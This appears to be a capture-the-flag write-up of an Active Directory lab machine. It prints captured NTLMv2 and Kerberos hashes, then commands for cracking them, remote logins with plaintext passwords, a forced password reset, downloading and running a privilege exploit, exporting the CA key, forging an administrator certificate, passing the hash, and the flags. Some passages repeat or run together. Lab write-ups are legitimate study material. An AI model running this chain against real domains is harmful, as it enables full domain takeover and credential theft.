$NETNTLMv2$WS-01$E2D9C809C5509576$620E63E5036519B65285EB3CBBDFD583$01010000000000007C26F4DA922EDB01DC9D4ADDA000214A00000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E00680074006200070008007C26F4DA922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
$NETNTLMv2$WS-01$E8393B7BF095FA9D$3552F9AE0AAE4722D8AD9273E197C461$01010000000000007C26F4DA922EDB01E5F7C7EBA82B3DF600000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E00680074006200070008007C26F4DA922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
$NETNTLMv2$WS-01$F06EC6839AB777C7$3055B262FD455AE3F750A27D8F2AEE59$01010000000000001DE1E5DA922EDB015BDB1968AEF4BE9F00000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E00680074006200070008001DE1E5DA922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
$NETNTLMv2$WS-01$FAAD81B143D54CFF$1F2FB48C93D51B4CD83FF10480A4CA65$01010000000000001DE1E5DA922EDB012DD3D2C1EAB18DC100000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E00680074006200070008001DE1E5DA922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
$NETNTLMv2$WS-01$FE6DFD3C263B429D$7159247954A2E743D65150983082EFC5$01010000000000004EDCF8DA922EDB0181BCB5621F29D35D00000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E00680074006200070008004EDCF8DA922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000admin_ntlm.txt
john --wordlist=~/Pentest/WordLists/rockyou.txt --fork=4 admin_ntlm.txt❌ No luck cracking this one with the rockyou.txt word list.
$krb5pa$18$Lion.SK$CERTIFICATE$CERTIFICATE.HTBLion.SK$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0lion_as-req.txt
john --wordlist=~/Pentest/WordLists/rockyou.txt --fork=4 lion_as-req.txt
$krb5asrep$18$CERTIFICATE.HTBLion.SK$7a4181856efd330c4003a769$c2f35024d28d2d2babbcccd434f3c0a96963b85964f1177913f2b8dfe46a1478ddcfbfab16a53a1910baabd8e6b246ed194e957070a3cbeffbea5447cc97b33e6b473fd73629e7ecca7f56fe353333138375c2317d153e912c9f282382a842aec7a9f6a70714c983093950e6e43fa3b5fc92f0faa7ecaae688467388bbda5e7e596ec74680a72955e912cd8431b7849ab005d2a4aba74c7336aafa25dd05db3d4a5e74e5725de166f24b385af1333a131f25e8dbf07a96abb175707ac4839c6e4e7b9de9f7b23d7c05af250a103bbeb835cb23a1eaeace9d9f018a9f23ea5827ce6523326b2895860d23df2877e25d0311ecce8ec6b1274ea43188f9012d57d252f7eaa141a687b5c754f907be8e7ed7a33d41cc77b9ccfb0b5752e01256340b7fe8ada81122cd85038422d95313fa1b0dc480e58a8dd6dce273de596b33f6lion_as-rep.txt
john --wordlist=~/Pentest/WordLists/rockyou.txt --fork=4 lion_as-rep.txt❌ Again, no luck cracking this one with the rockyou.txt word list.
Verify the Credential
Domain CRA Managers users as wellWinRM as Lion.SK
evil-winrm -i DC01.certificate.htb -u 'lion.SK' -p '!QAZ2wsx'
ℹ️
Nothing too interesting from a local privilege escalation perspective when perusing the file system as this user.
BloodHound Data
💡
This is almost certainly looking like an AD CS abuse scenario -- especially when considering the name of the box. I am going to run
certipy-ad as Lion.SK to get a better view of the attack surface.certipy-ad find -vulnerable -u 'lion.sk' -p '!QAZ2wsx' -dc-host DC01.certificate.htb -text
20250606154607_Certipy.txt
Certificate Authorities
0
CA Name : Certificate-LTD-CA
DNS Name : DC01.certificate.htb
Certificate Subject : CN=Certificate-LTD-CA, DC=certificate, DC=htb
Certificate Serial Number : 75B2F4BBF31F108945147B466131BDCA
Certificate Validity Start : 2024-11-03 22:55:09+00:00
Certificate Validity End : 2034-11-03 23:05:09+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : CERTIFICATE.HTB\Administrators
Access Rights
ManageCa : CERTIFICATE.HTB\Administrators
CERTIFICATE.HTB\Domain Admins
CERTIFICATE.HTB\Enterprise Admins
ManageCertificates : CERTIFICATE.HTB\Administrators
CERTIFICATE.HTB\Domain Admins
CERTIFICATE.HTB\Enterprise Admins
Enroll : CERTIFICATE.HTB\Authenticated Users
Certificate Templates
0
Template Name : Delegated-CRA
Display Name : Delegated-CRA
Certificate Authorities : Certificate-LTD-CA
Enabled : True
Client Authentication : False
Enrollment Agent : True
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectAltRequireUpn
SubjectAltRequireEmail
SubjectRequireEmail
SubjectRequireDirectoryPath
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
AutoEnrollment
Private Key Flag : ExportableKey
Extended Key Usage : Certificate Request Agent
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2024-11-05T19:52:09+00:00
Template Last Modified : 2024-11-05T19:52:10+00:00
Permissions
Enrollment Permissions
Enrollment Rights : CERTIFICATE.HTB\Domain CRA Managers
CERTIFICATE.HTB\Domain Admins
CERTIFICATE.HTB\Enterprise Admins
Object Control Permissions
Owner : CERTIFICATE.HTB\Administrator
Full Control Principals : CERTIFICATE.HTB\Domain Admins
CERTIFICATE.HTB\Enterprise Admins
Write Owner Principals : CERTIFICATE.HTB\Domain Admins
CERTIFICATE.HTB\Enterprise Admins
Write Dacl Principals : CERTIFICATE.HTB\Domain Admins
CERTIFICATE.HTB\Enterprise Admins
Write Property Enroll : CERTIFICATE.HTB\Domain Admins
CERTIFICATE.HTB\Enterprise Admins
[+] User Enrollable Principals : CERTIFICATE.HTB\Domain CRA Managers
[!] Vulnerabilities
ESC3 : Template has Certificate Request Agent EKU set.
🛑
After some attempts to exploit this template, I did some research and ran
Passing this through ChatGPT, I found that this template is not a good candidate for either
certutil -v -template 'Delegated-CRA' on the box via WinRM. This was definitely a rabbit hole.Passing this through ChatGPT, I found that this template is not a good candidate for either
ESC3, because we cannot specify arbitrary names when requesting a certificate, nor ESC6 because the certificates issued on behalf of other users cannot be used for authentication purposes.Lateral to Ryan.K
Abuse GenericalAll to Change Password
Sara.B is in the Account Operators group which has extensive DACLs on a huge swath of users, including Ryan.K. I am interested in his WinRM access to see what he has access to, since he is the sole member of the Domain Storage Managers group.
net rpc user password 'Ryan.K' 'P@$$word123!' -U "CERTIFIED.HTB"/"Sara.B"%'Blink182' -S "DC01.certificate.htb"
Change Ryan.K password to P@$$word123!
WinRM as Ryan.K
evil-winrm -i DC01.certificate.htb -u Ryan.K -p 'P@$$word123!'
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ================================ =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
whoami /all output -- SeManageVolumePrivilege is almost certainly related to being in the Domain Storage Managers group
Release SeManageVolumeExploit · CsEnox/SeManageVolumeExploit
Contribute to CsEnox/SeManageVolumeExploit development by creating an account on GitHub.
CsEnox
There's a pre-compiled exploit here for the original published by xct (don't use pre-compiled exploits in a client environment)
This exploit grants full permission onC:\drive for all users on the machine.
Enables the privilege in the token
Creates handle to\.\C: with SYNCHRONIZE | FILE_TRAVERSE
Sends theFSCTL_SD_GLOBAL_CHANGEto replaceS-1-5-32-544 with S-1-5-32-545
wget https://github.com/CsEnox/SeManageVolumeExploit/releases/download/public/SeManageVolumeExploit.exe*Evil-WinRM* PS C:\Users\Ryan.K\Documents> upload SeManageVolumeExploit.exe& .\SeManageVolumeExploit.exe✅
From here, we've opened the entire
But, I'll stick to the current theme of the box and exploit permissions by exporting the CA key to forge certificates at will.
C:\ volume to all users on the system and we can technically escalate our privilege by reading the C:\Users\Administrator directory or by overwriting a system .dll. But, I'll stick to the current theme of the box and exploit permissions by exporting the CA key to forge certificates at will.
Becoming Domain Admin
Export the CA Key
& .\SeManageVolumeExploit.exeRe-run the exploit
certutil -exportPFX my 'Certificate-LTD-CA' .\pwn.pfxExport the CA key to a local .pfx file
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> download pwn.pfx
Forge a User Certificate
certipy-ad forge -ca-pfx pwn.pfx -upn 'administrator@certificate.htb' -subject 'CN=Administrator,CN=Users,DC=certificate,DC=htb' -out administrator.pfx
faketime certipy-ad auth -pfx administrator.pfx -dc-ip '10.129.236.230' -username 'Administrator' -domain 'certificate.htb'
Pass the Admin NT Hash
evil-winrm -i DC01.certificate.htb -u 'Administrator' -H 'd804304519bf0143c14cbf1c024408c6'
Flags
User
cfaf4119656ad942917f09f8f4b3070f
Root
eb541018197e6166dd4ff0495ba1c026
